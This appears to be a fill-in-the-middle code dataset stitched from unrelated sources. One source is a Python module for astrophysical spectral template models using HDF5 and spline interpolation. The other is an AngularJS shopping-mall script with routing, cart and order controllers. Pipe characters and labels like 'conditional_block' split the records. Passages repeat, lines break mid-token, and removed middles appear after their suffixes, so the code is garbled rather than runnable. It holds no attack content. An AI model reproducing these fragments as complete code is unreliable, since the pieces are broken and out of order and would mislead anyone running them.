idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def | (self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | add_method | identifier_name |
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
|
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized) | conditional_block |
template_model.py | self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
# Now set the values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reasons the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method which accept the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We can use interp2, which features spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contains the fluxes
at x / scale. This is useful for example when the template describe energies in the rest frame,
at which point the scale describe the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
| function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now susbsitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join | # Make the dictionary of parameters
function_definition = collections.OrderedDict()
| random_line_split |
index.js | 列表数据
$rootScope.isMore=true;//是否有后一页
$rootScope.isPrev=false;//是否有前一页
$rootScope.exit=function(){
$rootScope.userId="";
$rootScope.userName="";
}
$rootScope.jump=function(url){
$location.path(url);
}
$rootScope.$watch("searchMsg.pageNum",function(){
//判断分页按钮状态
$rootScope.isPrev=$rootScope.searchMsg.pageNum>1?true:false;
$rootScope.isMore=$rootScope.searchMsg.pageNum>=$rootScope.pageCount?false:true;
})
$rootScope.loadMore=function(n,url) {
//接收要跳转到的页面
$rootScope.searchMsg.pageNum=n;
$http.get(url+"?"+$.param($rootScope.searchMsg)).success(function (obj) {
$rootScope.pageCount=obj.pageCount;
$rootScope.len = obj.data.length;
if (innerWidth > 450) {//页面宽度不是手机页面时清空列表实现分页加载商品详情
$rootScope.proList = [];
$rootScope.num=[];
for(var i=1;i<=obj.pageCount;i++){
$rootScope.num.push(i);
$rootScope.isPageShow=true;
}
}else{
$rootScope.isPageShow=false;
if($rootScope.len<8){
$rootScope.searchMsg.pageNum++;
}
}
for (var i = 0; i < $rootScope.len; i++) {
var img=obj.data[i].img_sm;
obj.data[i].img_sm=img.slice(0,img.length-9)+"sm.jpg";
$rootScope.proList.push(obj.data[i]);
}
});
};
$rootScope.goToUserCenter=function(){
if($rootScope.userName){
$location.path('/mall_userCenter/1');
}else{
//TODO 弹出提示框;
alert("请登录");
}
}
}]);
//配置路由
app.config(function($routeProvider){
$routeProvider
.when("/APP_start",{
templateUrl:"tpl/APP_start.html"
})
.when("/mall_main",{
templateUrl:"tpl/mall_main.html",
controller:"mallMainCtrl"
})
.when("/mall_search/:id",{
templateUrl:"tpl/mall_search.html",
controller:"mallSearchCtrl"
})
.when("/mall_proList/:id",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
| app.controller("mallProListCtrl",["$scope",
"$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope | }else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]); | conditional_block |
index.js | ",{
templateUrl:"tpl/mall_proList.html",
controller:"mallProListCtrl"
})
.when("/mall_proListbyteam/:id",{
templateUrl:"tpl/mall_proListbyteam.html",
controller:"mallProListByTeamCtrl"
})
.when("/mall_detail/:id",{
templateUrl:"tpl/mall_detail.html",
controller:"mallDetailCtrl"
})
.when("/mall_lottery",{
templateUrl:"tpl/mall_lottery.html",
controller:"mallLotteryCtrl"
})
.when("/mall_userCenter/:id",{
templateUrl:"tpl/mall_userCenter.html",
controller:"mallUserCenterCtrl"
})
.otherwise({redirectTo:"/APP_start"})
});
app.controller("mallMainCtrl",["$scope",function($scope){
}]);
app.controller("mallDetailCtrl",["$scope","$routeParams","$http","$rootScope",function($scope,$routeParams,$http,$rootScope){
//接收路由传递的参数,向服务器端请求商品详情
$scope.order={}
$http.get("data/7_showProductDetails.php?proId="+$routeParams.id).success(function(obj){
$scope.proDetail=obj;
$scope.order.count=1;
$scope.order.proId=$routeParams.id;
$scope.colorList=obj.colorList;
$scope.order.colorId=$scope.colorList[0].colorId;//颜色id;
$scope.photoList=$scope.colorList[0].photoList;//颜色对应的图片列表
$scope.sizeList=$scope.colorList[0].sizeList;//颜色对应的尺寸列表
$scope.Img={};
$scope.Img.s=$scope.colorList[0].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.order.sizeId=$scope.colorList[0].sizeList[0].sizeId;
//商品详情数组
$scope.pinfo=obj.pinfo.split("_");
$scope.$watch("Img.s",function(){
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
})
$scope.$watch("order.colorId",function(){
for(var i=0;i<$scope.colorList.length;i++){
if($scope.order.colorId==$scope.colorList[i].colorId){
$scope.photoList=$scope.colorList[i].photoList;
$scope.Img.s=$scope.colorList[i].photoList[0].img_sm;
$scope.Img.m=$scope.Img.s.substring(0,$scope.Img.s.length-6)+"md.jpg";
$scope.sizeList=$scope.colorList[i].sizeList;
$scope.order.sizeId=$scope.colorList[i].sizeList[0].sizeId;
}
}
})
})
$scope.reduce=function(){
if($scope.order.count>1){
$scope.order.count--;
}
}
$scope.add=function(){
$scope.order.count++;
}
//加入购物车
$scope.addToCart=function(){
if($rootScope.userName){
$scope.order.uname=$rootScope.userName;
//发送请求提交数据
if($scope.order.proId!==undefined
&& $scope.order.count!==undefined
&& $scope.order.colorId!==undefined
&& $scope.order.sizeId!==undefined){
$http.post("data/8_cartAdd.php", $.param($scope.order)).success(function(txt){
if(txt=="ok"){
alert("商品添加购物车成功,您可以去到我的购物车进行结算")
}else{
alert("添加失败")
}
})
}
}else{
//TODO 弹出提示框,提醒用户登录
alert("您还未登录,请登录后在使用此功能")
}
}
}]);
app.controller("mallLotteryCtrl",["$scope",function($scope){
}]);
app.controller("mallSearchCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.kw=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/4_showProductByKw.php");
}]);
app.controller("mallProListCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.isPageShow=innerWidth>450?true:false;
$rootScope.searchMsg={};
$rootScope.searchMsg.pclass=$routeParams.id;
$rootScope.num=[];
$rootScope.proList=[];
$rootScope.loadMore(1,"data/5_showProductByPclass.php");
$scope.show=function(n){
$rootScope.loadMore(n+1,"data/5_showProductByPclass.php");
}
$scope.showNext=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.prev=function(){
$rootScope.searchMsg.pageNum--;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
$scope.add=function(){
$rootScope.searchMsg.pageNum++;
$rootScope.loadMore($rootScope.searchMsg.pageNum,"data/5_showProductByPclass.php");
}
}]);
app.controller("mallProListByTeamCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
$rootScope.searchMsg={};
$rootScope.searchMsg.team=$routeParams.id;
$rootScope.proList=[];
$rootScope.loadMore(1,"data/6_showProductByTeam.php");
}]);
app.controller("mallUserCenterCtrl",["$scope","$rootScope","$routeParams","$http",function($scope,$rootScope,$routeParams,$http){
if($routeParams.id==1){
$scope.isMyCart=true;
$scope.isMyOrder=false;
$http.get("data/9_cartShow.php?uname="+$rootScope.userName).success(function(data){
$scope.productList=data;
for(var i= 0,sum=0;i<$scope.productList.length;i++){
var total=($scope.productList[i].price*$scope.productList[i].count).toFixed(2);
$scope.productList[i].totalPrice=total;
sum+=Number(total);
}
$scope.total=sum;
})
$scope.removePro=function(did){
$scope.did=did;
$http.get("data/10_cartRemove.php?did="+did).success(function(txt){
if(txt=="ok"){
for(var i=0;i<$scope.productList.length;i++){
if($scope.productList[i].did==$scope.did){
$scope.total-=$scope.productList[i].totalPrice;
$scope.productList.splice(i,1);
break;
}
}
}else{
alert("删除失败了")
}
})
}
$scope.submitOrder=function(){
$scope.data={};
$scope.data.rcvId=1;
$scope.data.price=$scope.total;
$scope.data.payment=1;
$scope.data.uname=$rootScope.userName;
$scope.data.productList=JSON.stringify($scope.productList);
$http.post("data/11_addOrder.php", $.param($scope.data)).success(function(data){
if(data.msg=="succ"){
alert("订单提交成功,您的订单编号为"+data.orderNum+"; 您可以在我的订单中查看订单状态");
$scope.productList=[];
$scope.total=0;
}else{
alert("订单提交失败");
}
})
}
}else{
$scope.isMyCart=false;
